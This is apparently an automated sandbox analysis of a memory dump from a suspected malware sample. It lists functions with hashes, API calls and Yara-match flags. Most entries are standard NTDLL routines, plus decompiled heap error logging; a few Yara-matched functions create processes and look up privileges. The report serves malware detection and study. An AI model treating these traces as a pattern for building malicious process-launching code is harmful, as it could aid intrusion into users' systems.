Uniqueness

Uniqueness Score: -1.00%

Function 053D9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 053D954A

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a2c48b1ff7e3fbaad6ad60d94714d80f9e601286521f58a2d05027694747adfd
Instruction ID: 218c94c7e15cb5d6e982025e3dd129b6a82acc8ecfb9e39f9b37715f532e4619
Opcode Fuzzy Hash: a2c48b1ff7e3fbaad6ad60d94714d80f9e601286521f58a2d05027694747adfd
Instruction Fuzzy Hash: FC90047D311010030105F55D074451700D7D7D53D13D1C435F5047554CD771CC717171

Uniqueness

Uniqueness Score: -1.00%

Function 053D99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 053D99AA

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5eeae9d816c924b698396be37cb9758f9f77e85fef0717237ec082f6f15272bd
Instruction ID: eea0cfc008881a8402c4994775e73938abb8c6c1d71309215289ceab380067b9
Opcode Fuzzy Hash: 5eeae9d816c924b698396be37cb9758f9f77e85fef0717237ec082f6f15272bd
Instruction Fuzzy Hash: 6B9002A534101442D10061594454B160055D7E1381F91C429E5095558D8659CC527166

Uniqueness

Uniqueness Score: -1.00%

Function 053D95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 053D95DA

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 46e8003e8121a462c48f787c73a6ceaebd6a141e1341b663c12816e2759b3e0a
Instruction ID: 82f345d66569a66bf3d1243b2ca1fdfc0cdf74c222da93c1ef47de6e89adb20f
Opcode Fuzzy Hash: 46e8003e8121a462c48f787c73a6ceaebd6a141e1341b663c12816e2759b3e0a
Instruction Fuzzy Hash: 259002A520201003410571594454626405A97E0281B91C435E5045594DC56588917165

Uniqueness

Uniqueness Score: -1.00%

Function 053D9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 053D986A

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f12eb281a489ecc71c5ccdcedacb844219476e95ec80d29bb685751127216217
Instruction ID: 00245da6820e83f815b131788ef276efa56f6d615c6506390bae8acc5cc7b38c
Opcode Fuzzy Hash: f12eb281a489ecc71c5ccdcedacb844219476e95ec80d29bb685751127216217
Instruction Fuzzy Hash: 0390027520101413D11161594544717005997D02C1FD1C826A445555CD96968952B161

Uniqueness

Uniqueness Score: -1.00%

Function 053D9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 053D984A

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2e26ad78943fda637cb09ef7bd17d16912bb2a26713f2380c96571f32692328f
Instruction ID: 3d38c79dfbdfd747fe1558c0421e077bfc297ab2c88bc5dff485e7be35ba9424
Opcode Fuzzy Hash: 2e26ad78943fda637cb09ef7bd17d16912bb2a26713f2380c96571f32692328f
Instruction Fuzzy Hash: 6C900265242051525545B15944445174056A7E02C17D1C426A5445954C85669856E661

Uniqueness

Uniqueness Score: -1.00%

Function 053D9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 053D971A

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cb366ec2d8c910929c9e03648726f51441c21b674ddb07a1a7b9abff510693a5
Instruction ID: b19118ffb1be45b6dd38c7e23e4a4a381420195940a82024b77aad6eb53fcda5
Opcode Fuzzy Hash: cb366ec2d8c910929c9e03648726f51441c21b674ddb07a1a7b9abff510693a5
Instruction Fuzzy Hash: FE90027520101402D10065995448656005597E0381F91D425A9055559EC6A588917171

Uniqueness

Uniqueness Score: -1.00%

Function 053D9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 053D978A

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5fd7e6f318dd58baf176cc283f228f562bfd3b22ad01a9bcd6adb4986ff685ab
Instruction ID: 575f9f7dfde5aded7c9a8b9e785c1e11e48fdf8e48bc71ebda3740f0e36ba83d
Opcode Fuzzy Hash: 5fd7e6f318dd58baf176cc283f228f562bfd3b22ad01a9bcd6adb4986ff685ab
Instruction Fuzzy Hash: F790026D21301002D1807159544861A005597D1282FD1D829A404655CCC95588696361

Uniqueness

Uniqueness Score: -1.00%

Function 053D9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 053D9FEA

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 368d9e826a6a264db246f425faaea43e4df5c27917547527d7bd116ad5ab6ebc
Instruction ID: 0c36b4c31fdc1f582b63b24ce49992ea7fb19ea2ed4b81df471b3e71a158882e
Opcode Fuzzy Hash: 368d9e826a6a264db246f425faaea43e4df5c27917547527d7bd116ad5ab6ebc
Instruction Fuzzy Hash: 7390027531115402D11061598444716005597D1281F91C825A485555CD86D588917162

Uniqueness

Uniqueness Score: -1.00%

Function 053D9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 053D966A

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a8a90d8ed1c75b74be2a7ea170133bb01d5dd9c70e56539fe3e13c6b8186f076
Instruction ID: c26b4d6e5ac1c8ffcdedffa4f012ad4af189b8c15bc2db47daf4691b92d59276
Opcode Fuzzy Hash: a8a90d8ed1c75b74be2a7ea170133bb01d5dd9c70e56539fe3e13c6b8186f076
Instruction Fuzzy Hash: FD90027520101802D1807159444465A005597D1381FD1C429A4056658DCA558A5977E1

Uniqueness

Uniqueness Score: -1.00%

Function 053D9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 053D9A5A

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1b7b67085bcf823f59cf6d77da9373675b227839d7abfcc15e47e4910e827d20
Instruction ID: 65e0a8f0d540f187e951663abe20e8b3ec81c89af60c89d4455701c2120f4f64
Opcode Fuzzy Hash: 1b7b67085bcf823f59cf6d77da9373675b227839d7abfcc15e47e4910e827d20
Instruction Fuzzy Hash: 4790026521181042D20065694C54B17005597D0383F91C529A4185558CC95588616561

Uniqueness

Uniqueness Score: -1.00%

Function 053D9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 053D965A

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2cdd1cda06f762cb6cf9879a32d2ce45dc782e035654ec4caee18801da234b3c
Instruction ID: c447b59bff00cc559dfad1e5658c215bdbc6a75b7ddd55104f4dc75b093c5624
Opcode Fuzzy Hash: 2cdd1cda06f762cb6cf9879a32d2ce45dc782e035654ec4caee18801da234b3c
Instruction Fuzzy Hash: D690027520505842D14071594444A56006597D0385F91C425A4095698D96658D55B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 053D96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 053D96EA

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 28f96a9bfd95f16f09c0ef3793f150a87442d2f949bf9fc44c209eb2efdc2fcf
Instruction ID: 25dbc0059d0c6aa4b52db5fb23bd48e0938e16a196e9c29881ade8a88cb42b4f
Opcode Fuzzy Hash: 28f96a9bfd95f16f09c0ef3793f150a87442d2f949bf9fc44c209eb2efdc2fcf
Instruction Fuzzy Hash: 6E90027520109802D1106159844475A005597D0381F95C825A845565CD86D588917161

Uniqueness

Uniqueness Score: -1.00%

Function 053D96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 053D96DA

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 02afa41e300bddfd09b2b07cbd8cc9d300eb1aedfd2990005fc471415b2ee500
Instruction ID: df4923460708f2277ad65024bdf1c3901e01fba9ebe8bdabf8e1b8db02a0bb21
Opcode Fuzzy Hash: 02afa41e300bddfd09b2b07cbd8cc9d300eb1aedfd2990005fc471415b2ee500
Instruction Fuzzy Hash: A390027520101842D10061594444B56005597E0381F91C42AA4155658D8655C8517561

Uniqueness

Uniqueness Score: -1.00%

Function 0321A062, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03203AF8), ref: 0321A09D

Strings

.z`, xrefs: 0321A08C, 0321A098

Memory Dump Source

Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: a12eb8fa17fd586b17d51dff744fa8e3b506ecee7742bf8e5a6d82e443ab3faf
Instruction ID: da52dcfd470400c43294f97add19fd43e69a8d63a263ff0bdde16747dc383fc8
Opcode Fuzzy Hash: a12eb8fa17fd586b17d51dff744fa8e3b506ecee7742bf8e5a6d82e443ab3faf
Instruction Fuzzy Hash: A3E0EDB5200204AFCB18DF98CC49EAB3368EF48310F014154FD489B251D670E954CFE0

Uniqueness

Uniqueness Score: -1.00%

Function 0321A070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03203AF8), ref: 0321A09D

Strings

.z`, xrefs: 0321A08C, 0321A098

Memory Dump Source

Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: d41bc24b3af30a974d632b770e986a23650b1a3eb2661c36e0202eb2e6b15801
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: FEE01AB52102086BD714DF59CC44EA777ACEF88650F018554B9085B241C630E9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 032082F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0320834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0320836B

Memory Dump Source

Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
Instruction ID: 8375604f64b70594648b119c48bcedca288df04413291c0736cd920f4286c0ec
Opcode Fuzzy Hash: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
Instruction Fuzzy Hash: 6001DF35A903287AE720E6A89C02FBE766CAB40B50F054018FF08BE1C1E6D4691A42E6

Uniqueness

Uniqueness Score: -1.00%

Function 032082B6, Relevance: 3.1, APIs: 2, Instructions: 54threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0320834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0320836B

Memory Dump Source

Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: bdb64c02f59ed78068033fbe3b7f67e7f6138fa5ff83fc27ea876146f4dd1d09
Instruction ID: 9d4a922ebfe6b075f4e98b9fe4e09f7ee765b3ee52fb025d4b7ab02536b6c61d
Opcode Fuzzy Hash: bdb64c02f59ed78068033fbe3b7f67e7f6138fa5ff83fc27ea876146f4dd1d09
Instruction Fuzzy Hash: AC017D3569032836E720A6585D02FFFB718AF81B25F154244FE48BD0C2D6D4648A46E1

Uniqueness

Uniqueness Score: -1.00%

Function 0321A0E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0321A134

Memory Dump Source

Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 0867136a12835a5b06aaa4e16dd3076eacb2c9e0382835d27face6ecd4fb20f2
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 7601AFB2210208ABCB54DF89DC80EEB77ADAF8C754F158258BA0DA7240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0321A0DF, Relevance: 1.5, APIs: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0321A134

Memory Dump Source

Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 83ff8a0763b7d250bb34a1b6bf9c048fae6a57057cba1c2a725af6fd4be8d1b7
Instruction ID: f33c22f11a1bbac5a72811ef6e6281f1b8d8fe52d8c0a8ed8df146201772a0d2
Opcode Fuzzy Hash: 83ff8a0763b7d250bb34a1b6bf9c048fae6a57057cba1c2a725af6fd4be8d1b7
Instruction Fuzzy Hash: 0501A4B2210108BFCB54CF99DC84EEB77ADAF8C754F158248FA5DA7251C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0321A1C1, Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0320F1A2,0320F1A2,?,00000000,?,?), ref: 0321A200

Memory Dump Source

Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 34f706437af20c1b1372b930f3260c99241dc153fdbee977d2fd685ed5ed76aa
Instruction ID: 9150573aef0dbddfc8924caddd924085a8b7bacc89dbd523430a6f869672d01e
Opcode Fuzzy Hash: 34f706437af20c1b1372b930f3260c99241dc153fdbee977d2fd685ed5ed76aa
Instruction Fuzzy Hash: B1E06DB66102046BCB24DF98EC80ED7B7A8EF45B60F118154FD0C6B241CA31E956CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 0321A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0320F1A2,0320F1A2,?,00000000,?,?), ref: 0321A200

Memory Dump Source

Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 99ce3e65114ad3c862e51f9f3ce152c4d7de973946f7f4652b61cec9af7912f5
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: F7E01AB52002086BDB10DF49CC84EE737ADEF88650F018154BA0C6B241C930E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0321A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(03214506,?,03214C7F,03214C7F,?,03214506,?,?,?,?,?,00000000,00000000,?), ref: 0321A05D

Memory Dump Source

Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 70fc6946c11138b9b7d7f030545acc289fb4ad684a1a255c12b5c666dbebfc2e
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 47E012B5210208ABDB14EF99CC80EA777ACEF88660F118558BA086B241C630F9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 0320F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,03208CF4,?), ref: 0320F6CB

Memory Dump Source

Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction ID: fcdda9779b3c1febfe221a741d0460a229c3eb2ed32007c3711c87534078d4cf
Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction Fuzzy Hash: 44D0A7757A03043BE720FAA59C03F2673CD5B54B00F490074FA4CDB3C3D950E00041A5

Uniqueness

Uniqueness Score: -1.00%

Function 053D967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 053D9694

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 480c12661ff8a4bcf23e9f0a6980a930e15a069e0b01d9b3f908c7f418e12840
Instruction ID: a279bc4aa58b388162a3904a630f93f68f686c6839bf5e2cbb7aa4bb012f958e
Opcode Fuzzy Hash: 480c12661ff8a4bcf23e9f0a6980a930e15a069e0b01d9b3f908c7f418e12840
Instruction Fuzzy Hash: CAB02B739010C0C5D600D3700608B37791077C0340F12C061D1020244A0378C080F2B1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0544B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0544B314
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0544B3D6
*** enter .cxr %p for the context, xrefs: 0544B50D
This failed because of error %Ix., xrefs: 0544B446
*** An Access Violation occurred in %ws:%s, xrefs: 0544B48F
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0544B53F
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0544B476
a NULL pointer, xrefs: 0544B4E0
The instruction at %p tried to %s , xrefs: 0544B4B6
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0544B2F3
The resource is owned exclusively by thread %p, xrefs: 0544B374
The resource is owned shared by %d threads, xrefs: 0544B37E
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0544B305
*** Inpage error in %ws:%s, xrefs: 0544B418
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0544B47D
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0544B323
The critical section is owned by thread %p., xrefs: 0544B3B9
*** enter .exr %p for the exception record, xrefs: 0544B4F1
<unknown>, xrefs: 0544B27E, 0544B2D1, 0544B350, 0544B399, 0544B417, 0544B48E
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0544B38F
The instruction at %p referenced memory at %p., xrefs: 0544B432
an invalid address, %p, xrefs: 0544B4CF
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0544B39B
*** Resource timeout (%p) in %ws:%s, xrefs: 0544B352
write to, xrefs: 0544B4A6
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0544B484
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0544B2DC
Go determine why that thread has not released the critical section., xrefs: 0544B3C5
read from, xrefs: 0544B4AD, 0544B4B2
*** then kb to get the faulting stack, xrefs: 0544B51C

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 47bf033c4cd86fa602ee861436a682f91f24fe3066849abff5f687dfa07b64c8
Instruction ID: 16f8ca638b9873d33128b94bdb22cf077a0a12992d2c756984b621d03b635638
Opcode Fuzzy Hash: 47bf033c4cd86fa602ee861436a682f91f24fe3066849abff5f687dfa07b64c8
Instruction Fuzzy Hash: 0081F675A80220FFEF29AA06DC89DFB3B36EF86A51F84408AF4045F255D671D411EB72

Uniqueness

Uniqueness Score: -1.00%

Function 05451C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E05451C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x53748a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0539B150();
				} else {
					E0539B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x548589c);
				E0539B150("Heap error detected at %p (heap handle %p)\n",  *0x54858a0);
				_t27 =  *0x5485898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M05451E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0539B150();
				} else {
					E0539B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0539B150("Error code: %d - %s\n",  *0x5485898);
				_t113 =  *0x54858a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0539B150();
					} else {
						E0539B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0539B150("Parameter1: %p\n",  *0x54858a4);
				}
				_t115 =  *0x54858a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0539B150();
					} else {
						E0539B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0539B150("Parameter2: %p\n",  *0x54858a8);
				}
				_t117 =  *0x54858ac; // 0x0
